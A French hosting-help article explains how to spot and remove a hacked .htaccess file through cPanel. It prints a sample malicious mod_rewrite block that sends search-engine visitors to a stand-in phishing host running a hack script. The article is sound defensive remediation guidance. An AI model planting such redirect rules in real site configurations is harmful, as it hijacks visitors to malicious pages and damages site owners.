Dans cet article nous allons discuter de mesures que vous pouvez prendre pour nettoyer et réparer un fichier .htaccess piraté.
Le fichier .htaccess est utilisé pour configurer principalement des règles pour contrôler la façon dont on accède à votre site.
Vous ne remarquerez peut-être pas que votre fichier .htaccess a été piraté jusqu'à ce qu'une enquête manuelle soit menée, ou jusqu'à ce que vous obteniez un avertissement de logiciels malveillants qui vous dit que votre site est redirigé vers un site malveillant.
Parfois, vous pouvez voir dans la barre d'état de votre navigateur Internet qu'un site Web étranger tente de charger du contenu sur votre site Web, ou vous remarquerez peut-être un avertissement dans votre navigateur Web.
Tous peuvent être des signes communs d'un hack du fichier .htaccess, vous pourriez remarquer également que vous avez perdu votre position dans le classement des moteurs de recherche.
C'est un cas typique où les pirates vont tenter de pirater votre fichier .htaccess de sorte que lorsque les robots des moteurs de recherche explorent votre site, ils sont redirigés vers le site Web que le pirate a mis en place au lieu du vôtre.
Vous pouvez faire un contrôle rapide depuis l'extérieur à l'aide de l'outil de Diagnostic Google pour savoir s'ils ont détecté quelque chose de malveillant sur votre site dans leur plus récente analyse.
Remplacez tout simplement VotreDomaine.com par votre vrai nom de domaine dans l'URL suivante:
http://google.com/safebrowsing/diagnostic?site=VotreDomaine.comVous pouvez en lire plus sur la page Outil de diagnostic Google.
Les étapes à suivre pour nettoyer le fichier .htacesss
En suivant les étapes ci-dessous vous pouvez apprendre à détecter un hack de .htaccess et à nettoyer votre fichier .htaccess si vous en détecter un.
Étape 1. Connectez-vous à cPanel
Étape 2. Sous la section Fichiers, cliquez sur Gestionnaire de Fichiers.
Étape 3. Sélectionnez l'option "Dossier Racine pour:" et sélectionnez votre domaine dans le menu déroulant.
Étape 4. Assurez-vous que "Montrer les fichiers cachés" est sélectionné
Étape 5. Cliquez sur "Allez"
Étape 6. Clique droit sur le fichier .htaccess et cliquez sur 'Éditer'
Étape7. Vous pourriez avoir une fenêtre de dialogue qui vous propose de choisir l'encodage, cliquez sur "Edit" simplement
Étape 8. Défilez de haut en bas pour voir si un bout de code semble suspect; de toute manière vous verrez très probablement quelque chose de ce genre:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://SiteHameconnage.tld/fichier_hack.php?t=3 [R,L]
</IfModule>Ce que ce code de réécriture essaie de faire c'est de vérifier le référent d'une requête, si c'est un moteur de recherche populaire, il le redirige vers leur site SiteHameconnage.tld et essaie de charger un script malicieux fichier_hack.php.
Parce que ces instructions conditionnelles RewriteCond ne s’appliqueraient pas à vous, et seulement aux moteurs de recherche, ce genre de hacks peut passer sous l’incognito pendant longtemps. Et le plus longtemps ils sont actifs, le plus ils affectent votre classement dans les moteurs de recherche.
Étape9. Pour supprimer ces instructions malicieuses de réécriture, vous pouvez simplement mettre en surbrillance tout le texte et appuyer 'Supp' sur votre clavier et par la suite cliquer sur "Enregistrer les modifications" sur le coin droit du haut du fichier.
Si vous n'êtes pas certains à 100% d'avoir affaire à un code malicieux de redirection, nous vous recommandons de sauvegarder votre fichier .htaccess avant de l'éditer. Pour ce faire il suffit de faire un clic-droit sur le fichier .htaccess à l'intérieur du Gestionnaire de Fichiers et de cliquer sur Copier et ensuite choisir le chemin de copie comme /public_html/.htaccess-BAK, et finalement cliquer sur Copie de Fichier(s).
Vous devez maintenant avoir compris comment trouver et éliminer un hack du fichier .htaccess qui pourrait causer des redirections malicieuses sur votre site. Vous serez très certainement intéressé de lire à propos des "Étapes à suivre après une attaque : cas de Wordpress".
